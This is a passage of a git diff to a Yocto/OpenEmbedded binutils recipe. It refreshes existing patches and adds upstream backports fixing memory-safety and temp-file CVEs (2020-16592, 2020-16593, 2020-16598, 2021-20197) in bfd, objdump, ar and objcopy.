+ 	 with different sizes for "long double" should use different
+ 	 negative type numbers.  See stabs.texinfo.  */
+       name = "long double";
+       rettype = debug_make_float_type (dhandle, 8);
+       break;
+-    case 15:
++    case 14:
+       name = "integer";
+       rettype = debug_make_int_type (dhandle, 4, FALSE);
+       break;
+-    case 16:
++    case 15:
+       name = "boolean";
+       rettype = debug_make_bool_type (dhandle, 4);
+       break;
+-    case 17:
++    case 16:
+       name = "short real";
+       rettype = debug_make_float_type (dhandle, 4);
+       break;
+-    case 18:
++    case 17:
+       name = "real";
+       rettype = debug_make_float_type (dhandle, 8);
+       break;
+-    case 19:
++    case 18:
+       /* FIXME */
+       name = "stringptr";
+       rettype = NULL;
+       break;
+-    case 20:
++    case 19:
+       /* FIXME */
+       name = "character";
+       rettype = debug_make_int_type (dhandle, 1, TRUE);
+       break;
+-    case 21:
++    case 20:
+       name = "logical*1";
+       rettype = debug_make_bool_type (dhandle, 1);
+       break;
+-    case 22:
++    case 21:
+       name = "logical*2";
+       rettype = debug_make_bool_type (dhandle, 2);
+       break;
+-    case 23:
++    case 22:
+       name = "logical*4";
+       rettype = debug_make_bool_type (dhandle, 4);
+       break;
+-    case 24:
++    case 23:
+       name = "logical";
+       rettype = debug_make_bool_type (dhandle, 4);
+       break;
+-    case 25:
++    case 24:
+       /* Complex type consisting of two IEEE single precision values.  */
+       name = "complex";
+       rettype = debug_make_complex_type (dhandle, 8);
+       break;
+-    case 26:
++    case 25:
+       /* Complex type consisting of two IEEE double precision values.  */
+       name = "double complex";
+       rettype = debug_make_complex_type (dhandle, 16);
+       break;
+-    case 27:
++    case 26:
+       name = "integer*1";
+       rettype = debug_make_int_type (dhandle, 1, FALSE);
+       break;
+-    case 28:
++    case 27:
+       name = "integer*2";
+       rettype = debug_make_int_type (dhandle, 2, FALSE);
+       break;
+-    case 29:
++    case 28:
+       name = "integer*4";
+       rettype = debug_make_int_type (dhandle, 4, FALSE);
+       break;
+-    case 30:
++    case 29:
+       /* FIXME */
+       name = "wchar";
+       rettype = debug_make_int_type (dhandle, 2, FALSE);
+       break;
+-    case 31:
++    case 30:
+       name = "long long";
+       rettype = debug_make_int_type (dhandle, 8, FALSE);
+       break;
+-    case 32:
++    case 31:
+       name = "unsigned long long";
+       rettype = debug_make_int_type (dhandle, 8, TRUE);
+       break;
+-    case 33:
++    case 32:
+       name = "logical*8";
+       rettype = debug_make_bool_type (dhandle, 8);
+       break;
+-    case 34:
++    case 33:
+       name = "integer*8";
+       rettype = debug_make_int_type (dhandle, 8, FALSE);
+       break;
+@@ -3664,9 +3665,7 @@ stab_xcoff_builtin_type (void *dhandle, struct stab_handle *info,
+     }
+ 
+   rettype = debug_name_type (dhandle, name, rettype);
+-
+-  info->xcoff_types[-typenum] = rettype;
+-
++  info->xcoff_types[typenum] = rettype;
+   return rettype;
+ }
+ 
+-- 
+2.27.0
+
diff --git a/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch b/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch
index 11a8110d40..88cce49e46 100644
--- a/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch
+++ b/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch
@@ -1,4 +1,4 @@
-From 7b24f81e04c9d00d96de7dbd250beade6d2c6e44 Mon Sep 17 00:00:00 2001
+From 12b658c0fe5771d16067baef933b7f34ed455def Mon Sep 17 00:00:00 2001
 From: Khem Raj <raj.khem@gmail.com>
 Date: Fri, 15 Jan 2016 06:31:09 +0000
 Subject: [PATCH] warn for uses of system directories when cross linking
@@ -59,8 +59,8 @@ Signed-off-by: Khem Raj <raj.khem@gmail.com>
  ld/ldfile.c     | 17 +++++++++++++++++
  ld/ldlex.h      |  2 ++
  ld/ldmain.c     |  2 ++
- ld/lexsup.c     | 15 +++++++++++++++
- 9 files changed, 85 insertions(+)
+ ld/lexsup.c     | 16 ++++++++++++++++
+ 9 files changed, 86 insertions(+)
 
 diff --git a/ld/config.in b/ld/config.in
 index d93c9b0830..5da2742bea 100644
@@ -77,10 +77,10 @@ index d93c9b0830..5da2742bea 100644
  #undef EXTRA_SHLIB_EXTENSION
  
 diff --git a/ld/configure b/ld/configure
-index 811134a503..f8c17c19ae 100755
+index f432f4637d..a9da3c115e 100755
 --- a/ld/configure
 +++ b/ld/configure
-@@ -826,6 +826,7 @@ with_lib_path
+@@ -830,6 +830,7 @@ with_lib_path
  enable_targets
  enable_64_bit_bfd
  with_sysroot
@@ -88,7 +88,7 @@ index 811134a503..f8c17c19ae 100755
  enable_gold
  enable_got
  enable_compressed_debug_sections
-@@ -1491,6 +1492,8 @@ Optional Features:
+@@ -1495,6 +1496,8 @@ Optional Features:
    --disable-largefile     omit support for large files
    --enable-targets        alternative target configurations
    --enable-64-bit-bfd     64-bit support (on hosts with narrower word sizes)
@@ -97,7 +97,7 @@ index 811134a503..f8c17c19ae 100755
    --enable-gold[=ARG]     build gold [ARG={default,yes,no}]
    --enable-got=<type>     GOT handling scheme (target, single, negative,
                            multigot)
-@@ -15788,6 +15791,19 @@ fi
+@@ -16624,6 +16627,19 @@ fi
  
  
  
@@ -222,10 +222,10 @@ index 5287f19a7f..55096e4fc9 100644
  
  /* The initial parser states.  */
 diff --git a/ld/ldmain.c b/ld/ldmain.c
-index da1ad17763..12d0b07d8a 100644
+index c4af10f4e9..95b56b2d2d 100644
 --- a/ld/ldmain.c
 +++ b/ld/ldmain.c
-@@ -274,6 +274,8 @@ main (int argc, char **argv)
+@@ -273,6 +273,8 @@ main (int argc, char **argv)
    command_line.warn_mismatch = TRUE;
    command_line.warn_search_mismatch = TRUE;
    command_line.check_section_addresses = -1;
@@ -235,7 +235,7 @@ index da1ad17763..12d0b07d8a 100644
    /* We initialize DEMANGLING based on the environment variable
       COLLECT_NO_DEMANGLE.  The gcc collect2 program will demangle the
 diff --git a/ld/lexsup.c b/ld/lexsup.c
-index 3d15cc491d..0e8b4f2b7a 100644
+index 3d15cc491d..6478821443 100644
 --- a/ld/lexsup.c
 +++ b/ld/lexsup.c
 @@ -550,6 +550,14 @@ static const struct ld_option ld_options[] =
@@ -253,10 +253,10 @@ index 3d15cc491d..0e8b4f2b7a 100644
  };
  
  #define OPTION_COUNT ARRAY_SIZE (ld_options)
-@@ -1603,6 +1611,13 @@ parse_args (unsigned argc, char **argv)
- 
+@@ -1604,6 +1612,14 @@ parse_args (unsigned argc, char **argv)
  	case OPTION_PRINT_MAP_DISCARDED:
  	  config.print_map_discarded = TRUE;
+ 	  break;
 +
 +	case OPTION_NO_POISON_SYSTEM_DIRECTORIES:
 +	  command_line.poison_system_directories = FALSE;
@@ -264,6 +264,6 @@ index 3d15cc491d..0e8b4f2b7a 100644
 +
 +	case OPTION_ERROR_POISON_SYSTEM_DIRECTORIES:
 +	  command_line.error_poison_system_directories = TRUE;
- 	  break;
++	  break;
  	}
      }
diff --git a/meta/recipes-devtools/binutils/binutils/0018-Include-members-in-the-variable-table-used-when-reso.patch b/meta/recipes-devtools/binutils/binutils/0018-Include-members-in-the-variable-table-used-when-reso.patch
new file mode 100644
index 0000000000..dc1e09d46b
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/0018-Include-members-in-the-variable-table-used-when-reso.patch
@@ -0,0 +1,32 @@
+From bf2252dca8c76e4c1f1c2dbf98dab7ffc9f5e5af Mon Sep 17 00:00:00 2001
+From: Nick Clifton <nickc@redhat.com>
+Date: Sat, 29 Aug 2020 08:03:15 +0100
+Subject: [PATCH] Include members in the variable table used when resolving
+ DW_AT_specification tags.
+
+	PR 26520
+	* dwarf2.c (scan_unit_for_symbols): Add member entries to the
+	variable table.
+
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=e6f04d55f681149a69102a73937d0987719c3f16]
+---
+ bfd/dwarf2.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/bfd/dwarf2.c b/bfd/dwarf2.c
+index dd3568a8532..ef2f6a3c63c 100644
+--- a/bfd/dwarf2.c
++++ b/bfd/dwarf2.c
+@@ -3248,7 +3248,8 @@ scan_unit_for_symbols (struct comp_unit *unit)
+       else
+ 	{
+ 	  func = NULL;
+-	  if (abbrev->tag == DW_TAG_variable)
++	  if (abbrev->tag == DW_TAG_variable
++	      || abbrev->tag == DW_TAG_member)
+ 	    {
+ 	      bfd_size_type amt = sizeof (struct varinfo);
+ 	      var = (struct varinfo *) bfd_zalloc (abfd, amt);
+-- 
+2.34.1
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2020-16592.patch b/meta/recipes-devtools/binutils/binutils/CVE-2020-16592.patch
new file mode 100644
index 0000000000..f5f9ccdd53
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2020-16592.patch
@@ -0,0 +1,61 @@
+From 7ecb51549ab1ec22aba5aaf34b70323cf0b8509a Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Wed, 15 Apr 2020 18:58:11 +0930
+Subject: [PATCH] PR25823, Use after free in bfd_hash_lookup
+
+	PR 25823
+	* peXXigen.c (_bfd_XXi_swap_sym_in <C_SECTION>): Don't use a
+	pointer into strings that may be freed for section name, always
+	allocate a new string.
+
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=7ecb51549ab1ec22aba5aaf34b70323cf0b8509a]
+CVE: CVE-2020-16592
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ bfd/peXXigen.c | 20 ++++++++++----------
+ 1 files changed, 10 insertions(+), 10 deletions(-)
+ 
+diff --git a/bfd/peXXigen.c b/bfd/peXXigen.c
+index b9eeb775d9b..8aa5914acd9 100644
+--- a/bfd/peXXigen.c
++++ b/bfd/peXXigen.c
+@@ -177,25 +177,25 @@ _bfd_XXi_swap_sym_in (bfd * abfd, void * ext1, void * in1)
+ 	  int unused_section_number = 0;
+ 	  asection *sec;
+ 	  flagword flags;
++	  size_t name_len;
++	  char *sec_name;
+ 
+ 	  for (sec = abfd->sections; sec; sec = sec->next)
+ 	    if (unused_section_number <= sec->target_index)
+ 	      unused_section_number = sec->target_index + 1;
+ 
+-	  if (name == namebuf)
++	  name_len = strlen (name) + 1;
++	  sec_name = bfd_alloc (abfd, name_len);
++	  if (sec_name == NULL)
+ 	    {
+-	      name = (const char *) bfd_alloc (abfd, strlen (namebuf) + 1);
+-	      if (name == NULL)
+-		{
+-		  _bfd_error_handler (_("%pB: out of memory creating name for empty section"),
+-				      abfd);
+-		  return;
+-		}
+-	      strcpy ((char *) name, namebuf);
++	      _bfd_error_handler (_("%pB: out of memory creating name "
++				    "for empty section"), abfd);
++	      return;
+ 	    }
++	  memcpy (sec_name, name, name_len);
+ 
+ 	  flags = SEC_HAS_CONTENTS | SEC_ALLOC | SEC_DATA | SEC_LOAD;
+-	  sec = bfd_make_section_anyway_with_flags (abfd, name, flags);
++	  sec = bfd_make_section_anyway_with_flags (abfd, sec_name, flags);
+ 	  if (sec == NULL)
+ 	    {
+ 	      _bfd_error_handler (_("%pB: unable to create fake empty section"),
+-- 
+2.27.0
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch b/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch
new file mode 100644
index 0000000000..c7c7829261
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch
@@ -0,0 +1,204 @@
+From aec72fda3b320c36eb99fc1c4cf95b10fc026729 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Thu, 16 Apr 2020 17:49:38 +0930
+Subject: [PATCH] PR25827, Null pointer dereferencing in scan_unit_for_symbols
+
+    PR 25827
+    * dwarf2.c (scan_unit_for_symbols): Wrap overlong lines.  Don't
+    strdup(0).
+
+Upstream-Status: Backport
+https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=aec72fda3b320c36eb99fc1c4cf95b10fc026729
+CVE: CVE-2020-16593 
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+
+Index: git/bfd/dwarf2.c
+===================================================================
+--- git.orig/bfd/dwarf2.c
++++ git/bfd/dwarf2.c
+@@ -295,12 +295,12 @@ struct comp_unit
+ /* This data structure holds the information of an abbrev.  */
+ struct abbrev_info
+ {
+-  unsigned int number;		/* Number identifying abbrev.  */
+-  enum dwarf_tag tag;		/* DWARF tag.  */
+-  int has_children;		/* Boolean.  */
+-  unsigned int num_attrs;	/* Number of attributes.  */
+-  struct attr_abbrev *attrs;	/* An array of attribute descriptions.  */
+-  struct abbrev_info *next;	/* Next in chain.  */
++  unsigned int         number;     /* Number identifying abbrev.  */
++  enum dwarf_tag       tag;        /* DWARF tag.  */
++  bfd_boolean          has_children;   /* TRUE if the abbrev has children.  */
++  unsigned int         num_attrs;  /* Number of attributes.  */
++  struct attr_abbrev * attrs;      /* An array of attribute descriptions.  */
++  struct abbrev_info * next;       /* Next in chain.  */
+ };
+ 
+ struct attr_abbrev
+@@ -1487,6 +1487,8 @@ struct varinfo
+ {
+   /* Pointer to previous variable in list of all variables */
+   struct varinfo *prev_var;
++  /* The offset of the varinfo from the start of the unit.  */
++  bfd_uint64_t unit_offset;
+   /* Source location file name */
+   char *file;
+   /* Source location line number */
+@@ -1497,7 +1499,7 @@ struct varinfo
+   /* Where the symbol is defined */
+   asection *sec;
+   /* Is this a stack variable? */
+-  unsigned int stack: 1;
++  bfd_boolean stack;
+ };
+ 
+ /* Return TRUE if NEW_LINE should sort after LINE.  */
+@@ -2871,7 +2873,7 @@ lookup_symbol_in_variable_table (struct
+   struct varinfo* each;
+ 
+   for (each = unit->variable_table; each; each = each->prev_var)
+-    if (each->stack == 0
++    if (! each->stack
+ 	&& each->file != NULL
+ 	&& each->name != NULL
+ 	&& each->addr == addr
+@@ -3166,6 +3168,20 @@ read_rangelist (struct comp_unit *unit,
+   return TRUE;
+ }
+ 
++static struct varinfo *
++lookup_var_by_offset (bfd_uint64_t offset, struct varinfo * table)
++{
++  while (table)
++    {
++      if (table->unit_offset == offset)
++   return table;
++      table = table->prev_var;
++    }
++
++  return NULL;
++}
++
++
+ /* DWARF2 Compilation unit functions.  */
+ 
+ /* Scan over each die in a comp. unit looking for functions to add
+@@ -3202,6 +3218,9 @@ scan_unit_for_symbols (struct comp_unit
+       bfd_vma low_pc = 0;
+       bfd_vma high_pc = 0;
+       bfd_boolean high_pc_relative = FALSE;
++      bfd_uint64_t current_offset;
++       
++      current_offset = info_ptr - unit->info_ptr_unit;
+ 
+       /* PR 17512: file: 9f405d9d.  */
+       if (info_ptr >= info_ptr_end)
+@@ -3234,12 +3253,13 @@ scan_unit_for_symbols (struct comp_unit
+ 	  goto fail;
+ 	}
+ 
+-      var = NULL;
+       if (abbrev->tag == DW_TAG_subprogram
+ 	  || abbrev->tag == DW_TAG_entry_point
+ 	  || abbrev->tag == DW_TAG_inlined_subroutine)
+ 	{
+ 	  bfd_size_type amt = sizeof (struct funcinfo);
++
++      var = NULL;
+ 	  func = (struct funcinfo *) bfd_zalloc (abfd, amt);
+ 	  if (func == NULL)
+ 	    goto fail;
+@@ -3268,13 +3288,15 @@ scan_unit_for_symbols (struct comp_unit
+ 	      if (var == NULL)
+ 		goto fail;
+ 	      var->tag = abbrev->tag;
+-	      var->stack = 1;
++	      var->stack = TRUE;
+ 	      var->prev_var = unit->variable_table;
+ 	      unit->variable_table = var;
++          var->unit_offset = current_offset;
+ 	      /* PR 18205: Missing debug information can cause this
+ 		 var to be attached to an already cached unit.  */
+ 	    }
+-
++	  else
++	    var = NULL;
+ 	  /* No inline function in scope at this nesting level.  */
+ 	  nested_funcs[nesting_level].func = 0;
+ 	}
+@@ -3362,6 +3384,33 @@ scan_unit_for_symbols (struct comp_unit
+ 	    {
+ 	      switch (attr.name)
+ 		{
++       case DW_AT_specification:
++         if (attr.u.val)
++           {
++             struct varinfo * spec_var;
++
++             spec_var = lookup_var_by_offset (attr.u.val,
++                              unit->variable_table);
++             if (spec_var == NULL)
++           {
++             _bfd_error_handler (_("DWARF error: could not find "
++                       "variable specification "
++                       "at offset %lx"),
++                         (unsigned long) attr.u.val);
++             break;
++           }
++
++             if (var->name == NULL)
++           var->name = spec_var->name;
++             if (var->file == NULL && spec_var->file != NULL)
++           var->file = strdup (spec_var->file);
++             if (var->line == 0)
++           var->line = spec_var->line;
++             if (var->sec == NULL)
++           var->sec = spec_var->sec;
++           }
++         break;
++
+ 		case DW_AT_name:
+ 		  if (is_str_attr (attr.form))
+ 		    var->name = attr.u.str;
+@@ -3378,7 +3427,7 @@ scan_unit_for_symbols (struct comp_unit
+ 
+ 		case DW_AT_external:
+ 		  if (attr.u.val != 0)
+-		    var->stack = 0;
++		    var->stack = FALSE;
+ 		  break;
+ 
+ 		case DW_AT_location:
+@@ -3392,7 +3441,7 @@ scan_unit_for_symbols (struct comp_unit
+ 		      if (attr.u.blk->data != NULL
+ 			  && *attr.u.blk->data == DW_OP_addr)
+ 			{
+-			  var->stack = 0;
++			  var->stack = FALSE;
+ 
+ 			  /* Verify that DW_OP_addr is the only opcode in the
+ 			     location, in which case the block size will be 1
+@@ -3888,7 +3937,7 @@ comp_unit_hash_info (struct dwarf2_debug
+        each_var = each_var->prev_var)
+     {
+       /* Skip stack vars and vars with no files or names.  */
+-      if (each_var->stack == 0
++      if (! each_var->stack
+ 	  && each_var->file != NULL
+ 	  && each_var->name != NULL)
+ 	/* There is no need to copy name string into hash table as
+Index: git/bfd/ChangeLog
+===================================================================
+--- git.orig/bfd/ChangeLog
++++ git/bfd/ChangeLog
+@@ -1,3 +1,9 @@
++2020-04-16  Alan Modra  <amodra@gmail.com>
++
++       PR 25827
++       * dwarf2.c (scan_unit_for_symbols): Wrap overlong lines.  Don't
++       strdup(0).
++
+ 2021-05-03  Alan Modra  <amodra@gmail.com>
+ 
+ 	PR 27755
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2020-16598.patch b/meta/recipes-devtools/binutils/binutils/CVE-2020-16598.patch
new file mode 100644
index 0000000000..52bd925c97
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2020-16598.patch
@@ -0,0 +1,32 @@
+From ca3f923f82a079dcf441419f4a50a50f8b4b33c2 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 17 Apr 2020 10:38:16 +0930
+Subject: [PATCH] PR25840, Null pointer dereference in objdump
+
+	PR 25840
+	* debug.c (debug_class_type_samep): Don't segfault on NULL type.
+
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=ca3f923f82a079dcf441419f4a50a50f8b4b33c2]
+CVE: CVE-2020-16598
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ binutils/debug.c   | 2 ++
+ 1 files changed, 2 insertions(+)
+
+diff --git a/binutils/debug.c b/binutils/debug.c
+index 022fa4edffb..5470e155edc 100644
+--- a/binutils/debug.c
++++ b/binutils/debug.c
+@@ -3277,6 +3277,8 @@ debug_class_type_samep (struct debug_handle *info, struct debug_type_s *t1,
+              names, since that sometimes fails in the presence of
+              typedefs and we really don't care.  */
+ 	  if (strcmp (f1->name, f2->name) != 0
++	      || f1->type == NULL
++	      || f2->type == NULL
+ 	      || ! debug_type_samep (info,
+ 				     debug_get_real_type ((void *) info,
+ 							  f1->type, NULL),
+-- 
+2.27.0
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-20197.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-20197.patch
new file mode 100644
index 0000000000..423814f98d
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-20197.patch
@@ -0,0 +1,572 @@
+From d3edaa91d4cf7202ec14342410194841e2f67f12 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 26 Feb 2021 11:30:32 +1030
+Subject: [PATCH v2] Reinstate various pieces backed out from smart_rename changes
+
+In the interests of a stable release various last minute smart_rename
+patches were backed out of the 2.36 branch.  The main reason to
+reinstate some of those backed out changes here is to make necessary
+followup fixes to commit 8e03235147a9 simple cherry-picks from
+mainline.  A secondary reason is that ar -M support isn't fixed for
+pr26945 without this patch.
+
+        PR 26945
+        * ar.c: Don't include libbfd.h.
+        (write_archive): Replace xmalloc+strcpy with xstrdup.
+        * arsup.c (temp_name, real_ofd): New static variables.
+        (ar_open): Use make_tempname and bfd_fdopenw.
+        (ar_save): Adjust to suit ar_open changes.
+        * objcopy.c: Don't include libbfd.h.
+        * rename.c: Rename and reorder variables.
+
+(cherry picked from commit 95b91a043aeaeb546d2fea556d84a2de1e917770)
+
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=d3edaa91d4cf7202ec14342410194841e2f67f12]
+CVE: CVE-2021-20197
+Signed-off-by: Vinay Kumar <vinay.m.engg@gmail.com>
+---
+ bfd/bfd-in2.h      |   2 +
+ bfd/opncls.c       |  33 ++++++++++
+ binutils/ar.c      |  15 +++--
+ binutils/arsup.c   |  37 ++++++++----
+ binutils/bucomm.c  |   4 +-
+ binutils/bucomm.h  |   5 +-
+ binutils/objcopy.c |  37 +++++++-----
+ binutils/rename.c  | 148 +++++++++++----------------------------------
+ 8 files changed, 133 insertions(+), 148 deletions(-)
+
+diff --git a/bfd/bfd-in2.h b/bfd/bfd-in2.h
+index 2e453c50c18..e53f54a8ab7 100644
+--- a/bfd/bfd-in2.h
++++ b/bfd/bfd-in2.h
+@@ -588,6 +588,8 @@ bfd *bfd_openr (const char *filename, const char *target);
+ 
+ bfd *bfd_fdopenr (const char *filename, const char *target, int fd);
+ 
++bfd *bfd_fdopenw (const char *filename, const char *target, int fd);
++
+ bfd *bfd_openstreamr (const char * filename, const char * target,
+     void * stream);
+ 
+diff --git a/bfd/opncls.c b/bfd/opncls.c
+index a03ad51c8fa..f9da97ed710 100644
+--- a/bfd/opncls.c
++++ b/bfd/opncls.c
+@@ -370,6 +370,39 @@ bfd_fdopenr (const char *filename, const char *target, int fd)
+   return bfd_fopen (filename, target, mode, fd);
+ }
+ 
++/*
++FUNCTION
++	bfd_fdopenw
++
++SYNOPSIS
++	bfd *bfd_fdopenw (const char *filename, const char *target, int fd);
++
++DESCRIPTION
++	<<bfd_fdopenw>> is exactly like <<bfd_fdopenr>> with the exception that
++	the resulting BFD is suitable for output.
++*/
++
++bfd *
++bfd_fdopenw (const char *filename, const char *target, int fd)
++{
++  bfd *out = bfd_fdopenr (filename, target, fd);
++
++  if (out != NULL)
++    {
++      if (!bfd_write_p (out))
++	{
++	  close (fd);
++	  _bfd_delete_bfd (out);
++	  out = NULL;
++	  bfd_set_error (bfd_error_invalid_operation);
++	}
++      else
++	out->direction = write_direction;
++    }
++
++  return out;
++}
++
+ /*
+ FUNCTION
+ 	bfd_openstreamr
+diff --git a/binutils/ar.c b/binutils/ar.c
+index 1057db9980e..c33a11e0d70 100644
+--- a/binutils/ar.c
++++ b/binutils/ar.c
+@@ -1195,20 +1195,23 @@ write_archive (bfd *iarch)
+   bfd *obfd;
+   char *old_name, *new_name;
+   bfd *contents_head = iarch->archive_next;
++  int ofd = -1;
+ 
+-  old_name = (char *) xmalloc (strlen (bfd_get_filename (iarch)) + 1);
+-  strcpy (old_name, bfd_get_filename (iarch));
+-  new_name = make_tempname (old_name);
++  old_name = xstrdup (bfd_get_filename (iarch));
++  new_name = make_tempname (old_name, &ofd);
+ 
+   if (new_name == NULL)
+     bfd_fatal (_("could not create temporary file whilst writing archive"));
+ 
+   output_filename = new_name;
+ 
+-  obfd = bfd_openw (new_name, bfd_get_target (iarch));
++  obfd = bfd_fdopenw (new_name, bfd_get_target (iarch), ofd);
+ 
+   if (obfd == NULL)
+-    bfd_fatal (old_name);
++    {
++      close (ofd);
++      bfd_fatal (old_name);
++    }
+ 
+   output_bfd = obfd;
+ 
+@@ -1246,7 +1249,7 @@ write_archive (bfd *iarch)
+   /* We don't care if this fails; we might be creating the archive.  */
+   bfd_close (iarch);
+ 
+-  if (smart_rename (new_name, old_name, 0) != 0)
++  if (smart_rename (new_name, old_name, NULL) != 0)
+     xexit (1);
+   free (old_name);
+   free (new_name);
+diff --git a/binutils/arsup.c b/binutils/arsup.c
+index 00967c972cd..b8ae4f7ec1a 100644
+--- a/binutils/arsup.c
++++ b/binutils/arsup.c
+@@ -42,6 +42,8 @@ extern int deterministic;
+ 
+ static bfd *obfd;
+ static char *real_name;
++static char *temp_name;
++static int real_ofd;
+ static FILE *outfile;
+ 
+ static void
+@@ -149,27 +151,24 @@ maybequit (void)
+ void
+ ar_open (char *name, int t)
+ {
+-  char *tname;
+-  const char *bname = lbasename (name);
+-  real_name = name;
++  real_name = xstrdup (name);
++  temp_name = make_tempname (real_name, &real_ofd);
+ 
+-  /* Prepend tmp- to the beginning, to avoid file-name clashes after
+-     truncation on filesystems with limited namespaces (DOS).  */
+-  if (asprintf (&tname, "%.*stmp-%s", (int) (bname - name), name, bname) == -1)
++  if (temp_name == NULL)
+     {
+-      fprintf (stderr, _("%s: Can't allocate memory for temp name (%s)\n"),
++      fprintf (stderr, _("%s: Can't open temporary file (%s)\n"),
+ 	       program_name, strerror(errno));
+       maybequit ();
+       return;
+     }
+ 
+-  obfd = bfd_openw (tname, NULL);
++  obfd = bfd_fdopenw (temp_name, NULL, real_ofd);
+ 
+   if (!obfd)
+     {
+       fprintf (stderr,
+ 	       _("%s: Can't open output archive %s\n"),
+-	       program_name,  tname);
++	       program_name, temp_name);
+ 
+       maybequit ();
+     }
+@@ -344,16 +343,30 @@ ar_save (void)
+     }
+   else
+     {
+-      char *ofilename = xstrdup (bfd_get_filename (obfd));
++      struct stat target_stat;
+ 
+       if (deterministic > 0)
+         obfd->flags |= BFD_DETERMINISTIC_OUTPUT;
+ 
+       bfd_close (obfd);
+ 
+-      smart_rename (ofilename, real_name, 0);
++      if (stat (real_name, &target_stat) != 0)
++	{
++	  /* The temp file created in ar_open has mode 0600 as per mkstemp.
++	     Create the real empty output file here so smart_rename will
++	     update the mode according to the process umask.  */
++	  obfd = bfd_openw (real_name, NULL);
++	  if (obfd != NULL)
++	    {
++	      bfd_set_format (obfd, bfd_archive);
++	      bfd_close (obfd);
++	    }
++	}
++
++      smart_rename (temp_name, real_name, NULL);
+       obfd = 0;
+-      free (ofilename);
++      free (temp_name);
++      free (real_name);
+     }
+ }
+ 
+diff --git a/binutils/bucomm.c b/binutils/bucomm.c
+index 9e6a02843e6..53244201f89 100644
+--- a/binutils/bucomm.c
++++ b/binutils/bucomm.c
+@@ -532,7 +532,7 @@ template_in_dir (const char *path)
+    as FILENAME.  */
+ 
+ char *
+-make_tempname (const char *filename)
++make_tempname (const char *filename, int *ofd)
+ {
+   char *tmpname = template_in_dir (filename);
+   int fd;
+@@ -550,7 +550,7 @@ make_tempname (const char *filename)
+       free (tmpname);
+       return NULL;
+     }
+-  close (fd);
++  *ofd = fd;
+   return tmpname;
+ }
+ 
+diff --git a/binutils/bucomm.h b/binutils/bucomm.h
+index d8318343f78..2b164e0af68 100644
+--- a/binutils/bucomm.h
++++ b/binutils/bucomm.h
+@@ -51,7 +51,7 @@ int display_info (void);
+ 
+ void print_arelt_descr (FILE *, bfd *, bfd_boolean, bfd_boolean);
+ 
+-char *make_tempname (const char *);
++char *make_tempname (const char *, int *);
+ char *make_tempdir (const char *);
+ 
+ bfd_vma parse_vma (const char *, const char *);
+@@ -71,7 +71,8 @@ extern void print_version (const char *);
+ /* In rename.c.  */
+ extern void set_times (const char *, const struct stat *);
+ 
+-extern int smart_rename (const char *, const char *, int);
++extern int smart_rename (const char *, const char *, struct stat *);
++
+ 
+ /* In libiberty.  */
+ void *xmalloc (size_t);
+diff --git a/binutils/objcopy.c b/binutils/objcopy.c
+index 212e25144e6..5ccbd926610 100644
+--- a/binutils/objcopy.c
++++ b/binutils/objcopy.c
+@@ -3682,7 +3682,7 @@ set_long_section_mode (bfd *output_bfd, bfd *input_bfd, enum long_section_name_h
+ /* The top-level control.  */
+ 
+ static void
+-copy_file (const char *input_filename, const char *output_filename,
++copy_file (const char *input_filename, const char *output_filename, int ofd,
+ 	   const char *input_target,   const char *output_target,
+ 	   const bfd_arch_info_type *input_arch)
+ {
+@@ -3757,9 +3757,14 @@ copy_file (const char *input_filename, const char *output_filename,
+       else
+ 	force_output_target = TRUE;
+ 
+-      obfd = bfd_openw (output_filename, output_target);
++      if (ofd >= 0)
++	obfd = bfd_fdopenw (output_filename, output_target, ofd);
++      else
++	obfd = bfd_openw (output_filename, output_target);
++
+       if (obfd == NULL)
+ 	{
++	  close (ofd);
+ 	  bfd_nonfatal_message (output_filename, NULL, NULL, NULL);
+ 	  status = 1;
+ 	  return;
+@@ -3787,13 +3792,19 @@ copy_file (const char *input_filename, const char *output_filename,
+       if (output_target == NULL)
+ 	output_target = bfd_get_target (ibfd);
+ 
+-      obfd = bfd_openw (output_filename, output_target);
++      if (ofd >= 0)
++	obfd = bfd_fdopenw (output_filename, output_target, ofd);
++      else
++	obfd = bfd_openw (output_filename, output_target);
++
+       if (obfd == NULL)
+  	{
++	  close (ofd);
+  	  bfd_nonfatal_message (output_filename, NULL, NULL, NULL);
+  	  status = 1;
+  	  return;
+  	}
++
+       /* This is a no-op on non-Coff targets.  */
+       set_long_section_mode (obfd, ibfd, long_section_names);
+ 
+@@ -4746,6 +4757,7 @@ strip_main (int argc, char *argv[])
+       int hold_status = status;
+       struct stat statbuf;
+       char *tmpname;
++      int tmpfd = -1;
+ 
+       if (get_file_size (argv[i]) < 1)
+ 	{
